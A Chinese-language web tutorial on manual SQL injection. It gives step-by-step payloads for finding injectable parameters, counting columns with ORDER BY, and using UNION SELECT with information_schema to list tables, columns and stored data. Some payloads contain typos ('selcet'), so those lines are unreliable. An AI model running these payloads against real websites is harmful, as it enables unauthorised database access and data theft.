sql手工注入的方法是什么

這篇文章主要介紹“sql手工注入的方法是什么”的相關(guān)知識，小編通過實際案例向大家展示操作過程，操作方法簡單快捷，實用性強，希望這篇“sql手工注入的方法是什么”文章能幫助大家解決問題。

網(wǎng)站建設(shè)哪家好，找創(chuàng)新互聯(lián)公司！專注于網(wǎng)頁設(shè)計、網(wǎng)站建設(shè)、微信開發(fā)、小程序制作、集團企業(yè)網(wǎng)站建設(shè)等服務(wù)項目。為回饋新老客戶創(chuàng)新互聯(lián)還提供了博野免費建站歡迎大家使用！

判斷注入點

1.單引號法：直接在網(wǎng)址后面加一個單引號，如果頁面不能正常顯示，瀏覽器返回一些異常信息，則說明該鏈接可能存在sql注入漏洞

2.1=1和1=2：在網(wǎng)址后面的get傳參中加上 and 1=1 ，顯示正常，把1=1替換為1=2，顯示異常，說明網(wǎng)頁存在sql注入。

判斷注入類型

1.數(shù)字型注入：注入變量的值不需要用引號引起來，如

select * from user where id=$id;

2.字符型注入：注入變量會用引號包裹起來，如`

select * from user where username='$username';`

注入時注意要閉合引號。
3.搜索型注入：

select * from user where username like '%$pass%';

把sql語句構(gòu)造為

select * from user where username like '%$pass%' union select語句 '%%'；

即傳輸?shù)淖兞繛?pass%’ union select語句 '% 形成閉合。

判斷注入點提交方式

通過抓包等方式判斷注入點的提交方式是get,post,還是cookie。

使用order by 查詢字段

使用order by 語句可以查詢出數(shù)據(jù)庫有多少個字段，可以通過不斷的嘗試來確定數(shù)據(jù)庫字段數(shù)量，如在輸入oeder by 9時，頁面報錯而輸入order by 8時頁面顯示正常，即數(shù)據(jù)庫中有8個字段。
如查詢語句為：select * from user where id='$id';
可以構(gòu)造下面的輸入：(id = ') ' order by 3 '+--+
即查詢語句為：select * from user where id='' order by 3 '--'

使用聯(lián)合查詢來查詢當(dāng)前數(shù)據(jù)庫、用戶、版本信息

使用 union select 語句來查詢當(dāng)前使用用戶 user() ， 數(shù)據(jù)庫database() ,數(shù)據(jù)庫版本 version() ，服務(wù)器操作系統(tǒng)的@@version_compile_os等信息
version版本十分重要，如果版本在5.0以上，就可以使用information_schema庫來輕易的查詢想要的信息
構(gòu)造語句：

select * from user where id='' union select user(),database(),version()+--+;

查詢當(dāng)前數(shù)據(jù)庫中的表，列和值

5.0 版本以上的MySQL數(shù)據(jù)庫自帶的information_schema庫中存儲著數(shù)據(jù)庫中所有的表名和列明信息。
下面我們就應(yīng)該根據(jù)第五步查詢的當(dāng)前數(shù)據(jù)庫的結(jié)果（如數(shù)據(jù)庫為database_1）名下所有的表名tables的信息。
Information_schema.tables ：記錄著數(shù)據(jù)庫中所有表名信息的表。
構(gòu)造的查詢語句如下：

Select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database_1;--

查詢的結(jié)果為：第五步查詢的當(dāng)前數(shù)據(jù)庫中的表名信息。
Information_schema.columns：記錄著數(shù)據(jù)庫中所有的表中的列名信息；
下面就應(yīng)該根據(jù)上面查詢得到的表名信息(如表為table_1)查詢他的列名信息，構(gòu)造語句如下：

Select * from user where id='' union selcet 1,group_concat(column_name),3 from information_schema.columns where table_name=table_1;--

查詢出列名后，就可以直接通過聯(lián)合查詢查出表中存儲的信息（如查出的列名為column_1,column_2）構(gòu)造語句

Selcet * from user where id='' union select 1,column_1,column_2 from tables;--

即可查詢出指定數(shù)據(jù)庫指定表的存儲數(shù)據(jù)

關(guān)于“sql手工注入的方法是什么”的內(nèi)容就介紹到這里了，感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識，可以關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，小編每天都會為大家更新不同的知識點。

文章題目：sql手工注入的方法是什么
本文來源：http://bm7419.com/article12/gipsgc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站建設(shè)、做網(wǎng)站、企業(yè)建站、靜態(tài)網(wǎng)站、App設(shè)計、網(wǎng)站內(nèi)鏈

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)